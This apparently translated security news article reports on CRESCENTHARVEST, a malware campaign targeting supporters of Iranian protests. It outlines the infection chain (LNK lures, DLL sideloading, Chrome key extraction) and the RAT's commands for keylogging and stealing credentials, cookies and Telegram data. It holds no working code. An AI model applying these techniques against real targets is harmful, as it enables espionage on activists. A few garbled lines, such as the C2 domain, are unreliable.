Cybersecurity researchers have revealed details of a new campaign dubbed CRESCENTHARVEST, which likely targets supporters of ongoing protests in Iran, carrying out information theft and long-term espionage operations.
Acronis Threat Research Unit (TRU) announced that it had observed this activity since January 9th. The attack reportedly delivers a malicious payload that acts as a remote access Trojan (RAT) and information stealer, with the goal of executing commands, logging keystrokes, and exfiltrating sensitive data. It is currently unknown whether any of the attacks were successful.
“This campaign takes advantage of recent geopolitical developments to lure victims into opening malicious .LNK files disguised as protest-related images and videos,” researchers Subhajeet Sinha, Eliad Kimhi, and Darrell Virtusio said in a report released this week.
“These files are bundled with authentic media and Farsi-language reports that provide the latest information from ‘Iran’s rebellious cities.’ This support framework for the protests appears to be aimed at increasing credibility and attracting Farsi-speaking Iranians seeking information related to the protests.”
CRESCENTHARVEST is of unknown origin, but is believed to be the work of an Iranian-aligned threat group. The discovery marks the second campaign identified as targeting specific individuals in the aftermath of nationwide Iranian protests that began in late 2025.
Last month, French cybersecurity firm HarfangLab detailed a threat cluster called RedKitten that targeted non-governmental organizations and individuals involved in documenting recent human rights violations in Iran with the purpose of infecting them with a custom backdoor known as SloppyMIO.
According to Acronis, the exact initial access vector used to distribute the malware is unknown. However, threat actors are suspected to rely on spear phishing or “protracted social engineering efforts” in which operators take time to build relationships with victims before sending malicious payloads.
It’s worth noting that Iranian hacker groups like Charming Kitten and Tortoiseshell have a storied history of engaging in sophisticated social engineering attacks, using fake personas to approach potential targets and foster relationships, sometimes lasting years, before weaponizing trust and infecting them with malware.
“The use of Farsi-language content for social engineering and the distributed files depicting the protests in heroic terms suggest an intention to attract Iranian-Persian-speaking individuals to support the ongoing protests,” the Switzerland-based security firm said.
The starting point of the attack chain is a malicious RAR archive that claims to contain information related to the Iranian protests, including various images and videos, and two Windows Shortcuts (LNK) files that use double extension tricks (*.jpg.lnk or *.mp4.lnk) to disguise themselves as image or video files.
Once launched, this malicious file contains PowerShell code that retrieves another ZIP archive while simultaneously opening a benign image or video to trick victims into thinking they have manipulated a benign file.
Inside the ZIP archive are several DLL files containing a legitimate Google-signed binary (‘software_reporter_tool.exe’) shipped as part of Chrome’s cleanup utility and two malicious libraries that are sideloaded by the executable to accomplish the threat actor’s goals.
urtcbased140d_d.dll is a C++ implant that extracts and decrypts Chrome’s app-bound encryption keys through a COM interface. This overlaps with an open source project known as ChromElevator. version.dll (also known as CRESCENTHARVEST) is a remote access tool that lists installed antivirus products and security tools, enumerates local user accounts on the device, loads DLLs, and collects system metadata, browser credentials, Telegram desktop account data, and keystrokes.
CRESCENTHARVEST uses the Windows Win HTTP API to communicate with command and control (C2) servers (“Service Log Information”).[.]com”) to blend in with normal traffic. Some of the supported commands are listed below.
Anti, His to perform anti-analysis checks Dir, list directories Cwd, get current working directory Cd, change directory GetUser, get user information ps, run PowerShell commands (doesn’t work) KeyLog, activate keylogger Tel_s, steal Telegram session data Cook, steal browser cookies Info, steal system information F_log, steal browser credentials Upload, upload files Shell, run shell commands
“The CRESCENTHARVEST campaign represents the latest chapter in a decade-long pattern of suspected state-sponsored cyber espionage targeting journalists, activists, researchers, and diaspora communities around the world,” Acronis said. “Much of what we observed with CRESCENTHARVEST reflects established trade craft, including LNK-based initial access, sideloading of DLLs with signed binaries, credential harvesting, and social engineering tailored to current events.”
Source link
